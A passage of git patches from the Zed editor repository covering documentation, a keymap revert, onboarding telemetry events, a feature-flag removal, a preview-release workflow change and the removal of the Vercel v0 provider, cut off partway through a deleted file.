diff --git a/docs/src/reference/all-settings.md b/docs/src/reference/all-settings.md index c6c33b8b5edd0d..f175d51a398d63 100644 --- a/docs/src/reference/all-settings.md +++ b/docs/src/reference/all-settings.md @@ -2456,6 +2456,15 @@ Example: } ``` +4. Preserve the cursor's vertical position within the viewport, falling back to + `center` when the cursor is offscreen. + +```json [settings] +{ + "go_to_definition_scroll_strategy": "preserve" +} +``` + ## Hard Tabs - Description: Whether to indent lines using tab characters or multiple spaces. From 9bdb53f35ab0d08d4c249976b9479c69491f8ad7 Mon Sep 17 00:00:00 2001 From: Conrad Irwin Date: Wed, 29 Apr 2026 09:33:12 +0200 Subject: [PATCH 091/231] Revert "Enable Vim/Helix keybindings when the base keymap is set to None" (#55144) Reverts zed-industries/zed#54899 Release notes: - Reverted the "none" keymap to be literally nothing --- crates/zed/src/zed.rs | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/crates/zed/src/zed.rs b/crates/zed/src/zed.rs index 2b1ff93581c20e..6d1a9c176f1193 100644 --- a/crates/zed/src/zed.rs +++ b/crates/zed/src/zed.rs @@ -2074,16 +2074,16 @@ fn reload_keymaps(cx: &mut App, mut user_key_bindings: Vec) { pub fn load_default_keymap(cx: &mut App) { let base_keymap = *BaseKeymap::get_global(cx); - if base_keymap != BaseKeymap::None { - cx.bind_keys( - KeymapFile::load_asset(DEFAULT_KEYMAP_PATH, Some(KeybindSource::Default), cx).unwrap(), - ); + if base_keymap == BaseKeymap::None { + return; + } - if let Some(asset_path) = base_keymap.asset_path() { - cx.bind_keys( - KeymapFile::load_asset(asset_path, Some(KeybindSource::Base), cx).unwrap(), - ); - } + cx.bind_keys( + KeymapFile::load_asset(DEFAULT_KEYMAP_PATH, Some(KeybindSource::Default), cx).unwrap(), + ); + + if let Some(asset_path) = base_keymap.asset_path() { + cx.bind_keys(KeymapFile::load_asset(asset_path, Some(KeybindSource::Base), cx).unwrap()); } if VimModeSetting::get_global(cx).0 || 
vim_mode_setting::HelixModeSetting::get_global(cx).0 { From d95ef5ffc56f49e372211976479bb8369e56053a Mon Sep 17 00:00:00 2001 From: Katie Geer Date: Wed, 29 Apr 2026 00:44:06 -0700 Subject: [PATCH 092/231] onboarding: Telemetry for new AI setup buttons (#55145) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [ x] Unsafe blocks (if any) have justifying comments - [ x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ n/a] Tests cover the new/changed behavior - [ n/a] Performance impact has been considered and is acceptable Release Notes: - N/A --------- Co-authored-by: Zed Zippy <234243425+zed-zippy[bot]@users.noreply.github.com> --- crates/onboarding/src/basics_page.rs | 5 +++- crates/onboarding/src/onboarding.rs | 37 ++++++++++++++++++++++++++++ 2 files changed, 41 insertions(+), 1 deletion(-) diff --git a/crates/onboarding/src/basics_page.rs b/crates/onboarding/src/basics_page.rs index 4817e897f7715d..7d021c54447666 100644 --- a/crates/onboarding/src/basics_page.rs +++ b/crates/onboarding/src/basics_page.rs @@ -528,7 +528,8 @@ fn render_import_settings_section(tab_index: &mut isize, cx: &mut App) -> impl I .child(h_flex().gap_1().child(vscode).child(cursor)) } -const FEATURED_AGENT_IDS: &[&str] = &["claude-acp", "codex-acp", "github-copilot-cli", "cursor"]; +pub(crate) const FEATURED_AGENT_IDS: &[&str] = + &["claude-acp", "codex-acp", "github-copilot-cli", "cursor"]; fn render_registry_agent_button( agent: &RegistryAgent, @@ -565,6 +566,7 @@ fn render_registry_agent_button( .state(state_element) .disabled(installed) .on_click(move |_, _, cx| { + telemetry::event!("Welcome Agent Install Clicked", agent = agent_id.as_str()); let agent_id = agent_id.clone(); update_settings_file(fs.clone(), cx, move |settings, _| { let agent_servers = settings.agent_servers.get_or_insert_default(); @@ -645,6 +647,7 @@ fn 
render_zed_agent_button(user_store: &Entity, cx: &mut App) -> impl }) } else { this.on_click(move |_, _, cx| { + telemetry::event!("Welcome Zed Agent Sign In Clicked"); let client = Client::global(cx); cx.spawn(async move |cx| client.sign_in_with_optional_connect(true, cx).await) .detach_and_log_err(cx); diff --git a/crates/onboarding/src/onboarding.rs b/crates/onboarding/src/onboarding.rs index ce9a383a606f4d..652febbda49481 100644 --- a/crates/onboarding/src/onboarding.rs +++ b/crates/onboarding/src/onboarding.rs @@ -1,5 +1,6 @@ use crate::multibuffer_hint::MultibufferHint; use client::{Client, UserStore, zed_urls}; +use cloud_api_types::Plan; use db::kvp::KeyValueStore; use fs::Fs; use gpui::{ @@ -8,6 +9,7 @@ use gpui::{ Subscription, Task, WeakEntity, Window, actions, }; use notifications::status_toast::StatusToast; +use project::agent_server_store::AllAgentServersSettings; use schemars::JsonSchema; use serde::Deserialize; use settings::{SettingsStore, VsCodeSettingsSource}; @@ -216,6 +218,41 @@ impl Onboarding { fn new(workspace: &Workspace, cx: &mut App) -> Entity { let font_family_cache = theme::FontFamilyCache::global(cx); + let installed_agents = cx + .global::() + .get::(None) + .clone(); + let client = Client::global(cx); + let status = *client.status().borrow(); + let plan = workspace.user_store().read(cx).plan(); + let zed_agent_state = if status.is_signed_out() + || matches!( + status, + client::Status::AuthenticationError | client::Status::ConnectionError + ) { + "signed_out" + } else if status.is_signing_in() { + "signing_in" + } else { + match plan { + Some(Plan::ZedPro) => "pro", + Some(Plan::ZedProTrial) => "trial", + Some(Plan::ZedBusiness) => "business", + Some(Plan::ZedStudent) => "student", + Some(Plan::ZedFree) | None => "free", + } + }; + let agents_installed = basics_page::FEATURED_AGENT_IDS + .iter() + .filter(|id| installed_agents.contains_key(**id)) + .copied() + .collect::>(); + telemetry::event!( + "Welcome Agent Setup Viewed", + 
zed_agent = zed_agent_state, + agents_installed = agents_installed, + ); + cx.new(|cx| { cx.spawn(async move |this, cx| { font_family_cache.prefetch(cx).await; From 45151e61d083edfb0d06d4b9ccbe0f234439bc8a Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Wed, 29 Apr 2026 10:43:56 +0200 Subject: [PATCH 093/231] agent: Remove streaming edit feature flag (#55152) We already enabled the feature flag, but that only applies to logged in users. Going to make sure that everyone gets the new tool as long as the model supports it. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - agent: Improve edit tool performance for models that support streaming tool calls. --- crates/agent/src/tests/edit_file_thread_test.rs | 5 ----- crates/agent/src/thread.rs | 7 ++----- crates/feature_flags/src/flags.rs | 12 ------------ 3 files changed, 2 insertions(+), 22 deletions(-) diff --git a/crates/agent/src/tests/edit_file_thread_test.rs b/crates/agent/src/tests/edit_file_thread_test.rs index 3efd7753740bc8..7e6d131c98fca2 100644 --- a/crates/agent/src/tests/edit_file_thread_test.rs +++ b/crates/agent/src/tests/edit_file_thread_test.rs @@ -210,11 +210,6 @@ async fn test_streaming_edit_json_parse_error_does_not_cause_unsaved_changes( super::init_test(cx); super::always_allow_tools(cx); - // Enable the streaming edit file tool feature flag. 
- cx.update(|cx| { - cx.update_flags(true, vec!["streaming-edit-file-tool".to_string()]); - }); - let fs = FakeFs::new(cx.executor()); fs.insert_tree( path!("/project"), diff --git a/crates/agent/src/thread.rs b/crates/agent/src/thread.rs index 07e6facb1fba89..7b3eab5d03f9f2 100644 --- a/crates/agent/src/thread.rs +++ b/crates/agent/src/thread.rs @@ -8,9 +8,7 @@ use crate::{ }; use acp_thread::{MentionUri, UserMessageId}; use action_log::ActionLog; -use feature_flags::{ - FeatureFlagAppExt as _, StreamingEditFileToolFeatureFlag, UpdatePlanToolFeatureFlag, -}; +use feature_flags::{FeatureFlagAppExt as _, UpdatePlanToolFeatureFlag}; use agent_client_protocol::schema as acp; use agent_settings::{ @@ -2867,8 +2865,7 @@ impl Thread { } } - let use_streaming_edit_tool = - cx.has_flag::() && model.supports_streaming_tools(); + let use_streaming_edit_tool = model.supports_streaming_tools(); let mut tools = self .tools diff --git a/crates/feature_flags/src/flags.rs b/crates/feature_flags/src/flags.rs index aae8137a0a6e9d..b23f8dbc56a7fc 100644 --- a/crates/feature_flags/src/flags.rs +++ b/crates/feature_flags/src/flags.rs @@ -47,18 +47,6 @@ impl FeatureFlag for DiffReviewFeatureFlag { } register_feature_flag!(DiffReviewFeatureFlag); -pub struct StreamingEditFileToolFeatureFlag; - -impl FeatureFlag for StreamingEditFileToolFeatureFlag { - const NAME: &'static str = "streaming-edit-file-tool"; - type Value = PresenceFlag; - - fn enabled_for_staff() -> bool { - true - } -} -register_feature_flag!(StreamingEditFileToolFeatureFlag); - pub struct UpdatePlanToolFeatureFlag; impl FeatureFlag for UpdatePlanToolFeatureFlag { From 56ee590588026a1f364b9a70822b2334459a5a9c Mon Sep 17 00:00:00 2001 From: Agus Zubiaga Date: Wed, 29 Apr 2026 11:31:24 +0200 Subject: [PATCH 094/231] gpui: Restore mouse cursor on window deactivation (#55155) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] 
The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- crates/gpui/src/window.rs | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/crates/gpui/src/window.rs b/crates/gpui/src/window.rs index 99374fd042ecd0..ad8bb0f735d5d4 100644 --- a/crates/gpui/src/window.rs +++ b/crates/gpui/src/window.rs @@ -1457,6 +1457,10 @@ impl Window { move |active| { handle .update(&mut cx, |_, window, cx| { + if !active { + cx.platform.set_cursor_style(CursorStyle::Arrow); + } + window.active.set(active); window.modifiers = window.platform_window.modifiers(); window.capslock = window.platform_window.capslock(); From 70d1450eeffb7e310d4488b4158c797ab2b83ce6 Mon Sep 17 00:00:00 2001 From: Conrad Irwin Date: Wed, 29 Apr 2026 11:40:38 +0200 Subject: [PATCH 095/231] Don't auto-release first preview (even if it's not .0) (#55166) Self-Review Checklist: - [ ] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [ ] Performance impact has been considered and is acceptable Release Notes: - N/A --- .github/workflows/release.yml | 52 ++++++++++++-- tooling/xtask/src/tasks/workflows/release.rs | 75 +++++++++++++++++--- 2 files changed, 111 insertions(+), 16 deletions(-) diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml index 90c13e820ca522..05a28ec9c49685 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release.yml @@ -718,7 +718,7 @@ jobs: needs: - validate_release_assets - release_compliance_check - if: startsWith(github.ref, 'refs/tags/v') && endsWith(github.ref, '-pre') && !endsWith(github.ref, 
'.0-pre') + if: startsWith(github.ref, 'refs/tags/v') && endsWith(github.ref, '-pre') runs-on: namespace-profile-2x4-ubuntu-2404 steps: - id: generate-token @@ -727,10 +727,51 @@ jobs: with: app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} - - name: gh release edit "$GITHUB_REF_NAME" --repo=zed-industries/zed --draft=false - run: gh release edit "$GITHUB_REF_NAME" --repo=zed-industries/zed --draft=false + - name: steps::checkout_repo + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd + with: + clean: false + ref: ${{ github.ref }} + token: ${{ steps.generate-token.outputs.token }} + - id: auto-release-preview + name: release::auto_release_preview::auto_release_preview + run: | + tag="$GITHUB_REF_NAME" + release_published=false + + if [[ ! "$tag" =~ ^v([0-9]+)\.([0-9]+)\.([0-9]+)-pre$ ]]; then + echo "::error::expected preview release tag in the form vMAJOR.MINOR.PATCH-pre, got $tag" + exit 1 + fi + + major="${BASH_REMATCH[1]}" + minor="${BASH_REMATCH[2]}" + should_release=true + + released_preview="$(script/get-released-version preview)" + if [[ -z "$released_preview" || "$released_preview" == "null" ]]; then + echo "::error::could not determine released preview version" + exit 1 + fi + + released_preview_major="$(echo "$released_preview" | cut -d. -f1)" + released_preview_minor="$(echo "$released_preview" | cut -d. 
-f2)" + + if [[ "$released_preview_major" != "$major" || "$released_preview_minor" != "$minor" ]]; then + should_release=false + echo "Leaving $tag as a draft because it is the first preview release for v${major}.${minor}.x" + fi + + if [[ "$should_release" == "true" ]]; then + gh release edit "$tag" --repo=zed-industries/zed --draft=false + release_published=true + fi + + echo "release_published=$release_published" >> "$GITHUB_OUTPUT" env: GITHUB_TOKEN: ${{ steps.generate-token.outputs.token }} + outputs: + release_published: ${{ steps.auto-release-preview.outputs.release_published }} push_release_update_notification: needs: - create_draft_release @@ -797,10 +838,10 @@ jobs: echo "" elif [ "$VALIDATE_RESULT" == "failure" ]; then echo "❌ Release validation failed for $TAG: missing assets: $RUN_URL" - elif [ "$AUTO_RELEASE_RESULT" == "success" ]; then - echo "✅ Release $TAG was auto-released successfully: $RELEASE_URL" elif [ "$AUTO_RELEASE_RESULT" == "failure" ]; then echo "❌ Auto release failed for $TAG: $RUN_URL" + elif [ "$AUTO_RELEASE_RESULT" == "success" ] && [ "$AUTO_RELEASE_PUBLISHED" == "true" ]; then + echo "✅ Release $TAG was auto-released successfully: $RELEASE_URL" else echo "👀 Release $TAG sitting freshly baked in the oven and waiting to be published: $RELEASE_URL" fi @@ -814,6 +855,7 @@ jobs: VALIDATE_RESULT: ${{ needs.validate_release_assets.result }} COMPLIANCE_RESULT: ${{ needs.release_compliance_check.result }} AUTO_RELEASE_RESULT: ${{ needs.auto_release_preview.result }} + AUTO_RELEASE_PUBLISHED: ${{ needs.auto_release_preview.outputs.release_published }} RUN_URL: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }} TAG: ${{ github.ref_name }} RESULT_RUN_TESTS_MAC: ${{ needs.run_tests_mac.result }} diff --git a/tooling/xtask/src/tasks/workflows/release.rs b/tooling/xtask/src/tasks/workflows/release.rs index c7db50bf6f698c..717bf8786b675a 100644 --- a/tooling/xtask/src/tasks/workflows/release.rs +++ 
b/tooling/xtask/src/tasks/workflows/release.rs @@ -64,7 +64,7 @@ pub(crate) fn release() -> Workflow { job_output, ); - let auto_release_preview = + let (auto_release_preview, auto_release_published) = auto_release_preview(&[&validate_release_assets, &release_compliance]); let test_jobs = [ @@ -82,6 +82,7 @@ pub(crate) fn release() -> Workflow { &validate_release_assets, &release_compliance, &auto_release_preview, + &auto_release_published, &test_jobs, &bundle, ); @@ -361,23 +362,70 @@ fn release_compliance_check(deps: &[&NamedJob], non_blocking_outcome: JobOutput) named::job(job) } -fn auto_release_preview(deps: &[&NamedJob]) -> NamedJob { +fn auto_release_preview(deps: &[&NamedJob]) -> (NamedJob, JobOutput) { + fn auto_release_preview(token: &StepOutput) -> Step { + named::bash(indoc::indoc! {r#" + tag="$GITHUB_REF_NAME" + release_published=false + + if [[ ! "$tag" =~ ^v([0-9]+)\.([0-9]+)\.([0-9]+)-pre$ ]]; then + echo "::error::expected preview release tag in the form vMAJOR.MINOR.PATCH-pre, got $tag" + exit 1 + fi + + major="${BASH_REMATCH[1]}" + minor="${BASH_REMATCH[2]}" + should_release=true + + released_preview="$(script/get-released-version preview)" + if [[ -z "$released_preview" || "$released_preview" == "null" ]]; then + echo "::error::could not determine released preview version" + exit 1 + fi + + released_preview_major="$(echo "$released_preview" | cut -d. -f1)" + released_preview_minor="$(echo "$released_preview" | cut -d. 
-f2)" + + if [[ "$released_preview_major" != "$major" || "$released_preview_minor" != "$minor" ]]; then + should_release=false + echo "Leaving $tag as a draft because it is the first preview release for v${major}.${minor}.x" + fi + + if [[ "$should_release" == "true" ]]; then + gh release edit "$tag" --repo=zed-industries/zed --draft=false + release_published=true + fi + + echo "release_published=$release_published" >> "$GITHUB_OUTPUT" + "#}) + .id("auto-release-preview") + .add_env(("GITHUB_TOKEN", token)) + } + let (authenticate, token) = steps::authenticate_as_zippy().into(); + let auto_release_preview_step = auto_release_preview(&token); + let release_published = StepOutput::new(&auto_release_preview_step, "release_published"); - named::job( + let job = named::job( dependant_job(deps) .runs_on(runners::LINUX_SMALL) .cond(Expression::new(indoc::indoc!( - r#"startsWith(github.ref, 'refs/tags/v') && endsWith(github.ref, '-pre') && !endsWith(github.ref, '.0-pre')"# + r#"startsWith(github.ref, 'refs/tags/v') && endsWith(github.ref, '-pre')"# ))) .add_step(authenticate) .add_step( - steps::script( - r#"gh release edit "$GITHUB_REF_NAME" --repo=zed-industries/zed --draft=false"#, - ) - .add_env(("GITHUB_TOKEN", &token)), + steps::checkout_repo() + .with_token(&token) + .with_ref(Context::github().ref_()), ) - ) + .add_step(auto_release_preview_step) + .outputs([( + release_published.name.to_owned(), + release_published.to_string(), + )]), + ); + let release_published = release_published.as_job_output(&job); + (job, release_published) } pub(crate) fn download_workflow_artifacts() -> Step { @@ -453,6 +501,7 @@ pub(crate) fn push_release_update_notification( validate_assets_job: &NamedJob, compliance_job: &NamedJob, auto_release_preview: &NamedJob, + auto_release_published: &JobOutput, test_jobs: &[&NamedJob], bundle_jobs: &ReleaseBundleJobs, ) -> NamedJob { @@ -487,6 +536,10 @@ pub(crate) fn push_release_update_notification( "AUTO_RELEASE_RESULT".into(), format!("${{{{ 
needs.{}.result }}}}", auto_release_preview.name), ), + ( + "AUTO_RELEASE_PUBLISHED".into(), + auto_release_published.to_string(), + ), ("RUN_URL".into(), CURRENT_ACTION_RUN_URL.to_string()), ("TAG".into(), Context::github().ref_name().to_string()), ] @@ -537,10 +590,10 @@ pub(crate) fn push_release_update_notification( echo "" elif [ "$VALIDATE_RESULT" == "failure" ]; then echo "❌ Release validation failed for $TAG: missing assets: $RUN_URL" - elif [ "$AUTO_RELEASE_RESULT" == "success" ]; then - echo "✅ Release $TAG was auto-released successfully: $RELEASE_URL" elif [ "$AUTO_RELEASE_RESULT" == "failure" ]; then echo "❌ Auto release failed for $TAG: $RUN_URL" + elif [ "$AUTO_RELEASE_RESULT" == "success" ] && [ "$AUTO_RELEASE_PUBLISHED" == "true" ]; then + echo "✅ Release $TAG was auto-released successfully: $RELEASE_URL" else echo "👀 Release $TAG sitting freshly baked in the oven and waiting to be published: $RELEASE_URL" fi From b831cf1ec08288001496db3910009997f215404c Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Wed, 29 Apr 2026 12:06:41 +0200 Subject: [PATCH 096/231] Remove v0 provider (#55177) Removes the Vercel v0 Provider, as the v0 API has been depredated/removed (https://api.v0.dev/v1) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - agent: Removed Vercel v0 provider as it has been deprecated by Vercel --- Cargo.lock | 11 - Cargo.toml | 2 - assets/icons/ai_v_zero.svg | 16 - assets/settings/default.json | 3 - crates/icons/src/icons.rs | 1 - crates/language_models/Cargo.toml | 1 - crates/language_models/src/language_models.rs | 9 - crates/language_models/src/provider.rs | 1 - 
crates/language_models/src/provider/vercel.rs | 470 ------------------ crates/language_models/src/settings.rs | 9 +- crates/settings_content/src/agent.rs | 1 - crates/settings_content/src/language_model.rs | 18 - crates/vercel/Cargo.toml | 23 - crates/vercel/LICENSE-GPL | 1 - crates/vercel/src/vercel.rs | 78 --- docs/src/ai/llm-providers.md | 13 - 16 files changed, 1 insertion(+), 656 deletions(-) delete mode 100644 assets/icons/ai_v_zero.svg delete mode 100644 crates/language_models/src/provider/vercel.rs delete mode 100644 crates/vercel/Cargo.toml delete mode 120000 crates/vercel/LICENSE-GPL delete mode 100644 crates/vercel/src/vercel.rs diff --git a/Cargo.lock b/Cargo.lock index 92dfd5304b5152..68392df3b7ada0 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -9659,7 +9659,6 @@ dependencies = [ "ui", "ui_input", "util", - "vercel", "x_ai", ] @@ -19450,16 +19449,6 @@ version = "0.2.15" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "accd4ea62f7bb7a82fe23066fb0957d48ef677f6eeb8215f372f52e48bb32426" -[[package]] -name = "vercel" -version = "0.1.0" -dependencies = [ - "anyhow", - "schemars 1.0.4", - "serde", - "strum 0.27.2", -] - [[package]] name = "version-compare" version = "0.2.0" diff --git a/Cargo.toml b/Cargo.toml index bf87ff22e5bc04..cd2b8cf54c26b1 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -213,7 +213,6 @@ members = [ "crates/ui_prompt", "crates/util", "crates/util_macros", - "crates/vercel", "crates/vim", "crates/vim_mode_setting", "crates/watch", @@ -470,7 +469,6 @@ ui_macros = { path = "crates/ui_macros" } ui_prompt = { path = "crates/ui_prompt" } util = { path = "crates/util" } util_macros = { path = "crates/util_macros" } -vercel = { path = "crates/vercel" } vim = { path = "crates/vim" } vim_mode_setting = { path = "crates/vim_mode_setting" } which_key = { path = "crates/which_key" } diff --git a/assets/icons/ai_v_zero.svg b/assets/icons/ai_v_zero.svg deleted file mode 100644 index 26d09ea26ac12e..00000000000000 --- 
a/assets/icons/ai_v_zero.svg +++ /dev/null @@ -1,16 +0,0 @@ - - - - - - - - - - - - - - - - diff --git a/assets/settings/default.json b/assets/settings/default.json index 02d93ece4a3f73..c0ec7b74f5abbf 100644 --- a/assets/settings/default.json +++ b/assets/settings/default.json @@ -2352,9 +2352,6 @@ "mistral": { "api_url": "https://api.mistral.ai/v1", }, - "vercel": { - "api_url": "https://api.v0.dev/v1", - }, "vercel_ai_gateway": { "api_url": "https://ai-gateway.vercel.sh/v1", }, diff --git a/crates/icons/src/icons.rs b/crates/icons/src/icons.rs index 568244912460ca..b49ad8e340b768 100644 --- a/crates/icons/src/icons.rs +++ b/crates/icons/src/icons.rs @@ -24,7 +24,6 @@ pub enum IconName { AiOpenCode, AiOpenRouter, AiVercel, - AiVZero, AiXAi, AiZed, Archive, diff --git a/crates/language_models/Cargo.toml b/crates/language_models/Cargo.toml index c74526dba23855..8e0216ba6c83c7 100644 --- a/crates/language_models/Cargo.toml +++ b/crates/language_models/Cargo.toml @@ -61,7 +61,6 @@ tokio = { workspace = true, features = ["rt", "rt-multi-thread"] } ui.workspace = true ui_input.workspace = true util.workspace = true -vercel = { workspace = true, features = ["schemars"] } x_ai = { workspace = true, features = ["schemars"] } [dev-dependencies] diff --git a/crates/language_models/src/language_models.rs b/crates/language_models/src/language_models.rs index d604ee432e487c..1920815871b7c7 100644 --- a/crates/language_models/src/language_models.rs +++ b/crates/language_models/src/language_models.rs @@ -28,7 +28,6 @@ use crate::provider::open_ai::OpenAiLanguageModelProvider; use crate::provider::open_ai_compatible::OpenAiCompatibleLanguageModelProvider; use crate::provider::open_router::OpenRouterLanguageModelProvider; use crate::provider::opencode::OpenCodeLanguageModelProvider; -use crate::provider::vercel::VercelLanguageModelProvider; use crate::provider::vercel_ai_gateway::VercelAiGatewayLanguageModelProvider; use crate::provider::x_ai::XAiLanguageModelProvider; pub use 
crate::settings::*; @@ -306,14 +305,6 @@ fn register_language_model_providers( )), cx, ); - registry.register_provider( - Arc::new(VercelLanguageModelProvider::new( - client.http_client(), - credentials_provider.clone(), - cx, - )), - cx, - ); registry.register_provider( Arc::new(VercelAiGatewayLanguageModelProvider::new( client.http_client(), diff --git a/crates/language_models/src/provider.rs b/crates/language_models/src/provider.rs index 35a1e90e4483ba..acf6579cae6b0b 100644 --- a/crates/language_models/src/provider.rs +++ b/crates/language_models/src/provider.rs @@ -12,6 +12,5 @@ pub mod open_ai_compatible; pub mod open_router; pub mod opencode; -pub mod vercel; pub mod vercel_ai_gateway; pub mod x_ai; diff --git a/crates/language_models/src/provider/vercel.rs b/crates/language_models/src/provider/vercel.rs deleted file mode 100644 index 188cb6d0322d36..00000000000000 --- a/crates/language_models/src/provider/vercel.rs +++ /dev/null @@ -1,470 +0,0 @@ -use anyhow::Result; -use collections::BTreeMap; -use credentials_provider::CredentialsProvider; -use futures::{FutureExt, StreamExt, future::BoxFuture}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; -use http_client::HttpClient; -use language_model::{ - ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, - LanguageModelCompletionEvent, LanguageModelId, LanguageModelName, LanguageModelProvider, - LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, - LanguageModelRequest, LanguageModelToolChoice, RateLimiter, env_var, -}; -use open_ai::ResponseStreamEvent; -pub use settings::VercelAvailableModel as AvailableModel; -use settings::{Settings, SettingsStore}; -use std::sync::{Arc, LazyLock}; -use strum::IntoEnumIterator; -use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*}; -use ui_input::InputField; -use util::ResultExt; -use vercel::VERCEL_API_URL; - -const PROVIDER_ID: 
LanguageModelProviderId = LanguageModelProviderId::new("vercel"); -const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("Vercel"); - -const API_KEY_ENV_VAR_NAME: &str = "VERCEL_API_KEY"; -static API_KEY_ENV_VAR: LazyLock = env_var!(API_KEY_ENV_VAR_NAME); - -#[derive(Clone, Debug, PartialEq)] -pub struct VercelSettings { - pub api_url: String, - pub available_models: Vec, -} - -pub struct VercelLanguageModelProvider { - http_client: Arc, - state: Entity, -} - -pub struct State { - api_key_state: ApiKeyState, - credentials_provider: Arc, -} - -impl State { - fn is_authenticated(&self) -> bool { - self.api_key_state.has_key() - } - - fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { - let credentials_provider = self.credentials_provider.clone(); - let api_url = VercelLanguageModelProvider::api_url(cx); - self.api_key_state.store( - api_url, - api_key, - |this| &mut this.api_key_state, - credentials_provider, - cx, - ) - } - - fn authenticate(&mut self, cx: &mut Context) -> Task> { - let credentials_provider = self.credentials_provider.clone(); - let api_url = VercelLanguageModelProvider::api_url(cx); - self.api_key_state.load_if_needed( - api_url, - |this| &mut this.api_key_state, - credentials_provider, - cx, - ) - } -} - -impl VercelLanguageModelProvider { - pub fn new( - http_client: Arc, - credentials_provider: Arc, - cx: &mut App, - ) -> Self { - let state = cx.new(|cx| { - cx.observe_global::(|this: &mut State, cx| { - let credentials_provider = this.credentials_provider.clone(); - let api_url = Self::api_url(cx); - this.api_key_state.handle_url_change( - api_url, - |this| &mut this.api_key_state, - credentials_provider, - cx, - ); - cx.notify(); - }) - .detach(); - State { - api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), - credentials_provider, - } - }); - - Self { http_client, state } - } - - fn create_language_model(&self, model: vercel::Model) -> Arc { - 
Arc::new(VercelLanguageModel { - id: LanguageModelId::from(model.id().to_string()), - model, - state: self.state.clone(), - http_client: self.http_client.clone(), - request_limiter: RateLimiter::new(4), - }) - } - - fn settings(cx: &App) -> &VercelSettings { - &crate::AllLanguageModelSettings::get_global(cx).vercel - } - - fn api_url(cx: &App) -> SharedString { - let api_url = &Self::settings(cx).api_url; - if api_url.is_empty() { - VERCEL_API_URL.into() - } else { - SharedString::new(api_url.as_str()) - } - } -} - -impl LanguageModelProviderState for VercelLanguageModelProvider { - type ObservableEntity = State; - - fn observable_entity(&self) -> Option> { - Some(self.state.clone()) - } -} - -impl LanguageModelProvider for VercelLanguageModelProvider { - fn id(&self) -> LanguageModelProviderId { - PROVIDER_ID - } - - fn name(&self) -> LanguageModelProviderName { - PROVIDER_NAME - } - - fn icon(&self) -> IconOrSvg { - IconOrSvg::Icon(IconName::AiVZero) - } - - fn default_model(&self, _cx: &App) -> Option> { - Some(self.create_language_model(vercel::Model::default())) - } - - fn default_fast_model(&self, _cx: &App) -> Option> { - Some(self.create_language_model(vercel::Model::default_fast())) - } - - fn provided_models(&self, cx: &App) -> Vec> { - let mut models = BTreeMap::default(); - - for model in vercel::Model::iter() { - if !matches!(model, vercel::Model::Custom { .. 
}) { - models.insert(model.id().to_string(), model); - } - } - - for model in &Self::settings(cx).available_models { - models.insert( - model.name.clone(), - vercel::Model::Custom { - name: model.name.clone(), - display_name: model.display_name.clone(), - max_tokens: model.max_tokens, - max_output_tokens: model.max_output_tokens, - max_completion_tokens: model.max_completion_tokens, - }, - ); - } - - models - .into_values() - .map(|model| self.create_language_model(model)) - .collect() - } - - fn is_authenticated(&self, cx: &App) -> bool { - self.state.read(cx).is_authenticated() - } - - fn authenticate(&self, cx: &mut App) -> Task> { - self.state.update(cx, |state, cx| state.authenticate(cx)) - } - - fn configuration_view( - &self, - _target_agent: language_model::ConfigurationViewTargetAgent, - window: &mut Window, - cx: &mut App, - ) -> AnyView { - cx.new(|cx| ConfigurationView::new(self.state.clone(), window, cx)) - .into() - } - - fn reset_credentials(&self, cx: &mut App) -> Task> { - self.state - .update(cx, |state, cx| state.set_api_key(None, cx)) - } -} - -pub struct VercelLanguageModel { - id: LanguageModelId, - model: vercel::Model, - state: Entity, - http_client: Arc, - request_limiter: RateLimiter, -} - -impl VercelLanguageModel { - fn stream_completion( - &self, - request: open_ai::Request, - cx: &AsyncApp, - ) -> BoxFuture<'static, Result>>> - { - let http_client = self.http_client.clone(); - - let (api_key, api_url) = self.state.read_with(cx, |state, cx| { - let api_url = VercelLanguageModelProvider::api_url(cx); - (state.api_key_state.key(&api_url), api_url) - }); - - let future = self.request_limiter.stream(async move { - let provider = PROVIDER_NAME; - let Some(api_key) = api_key else { - return 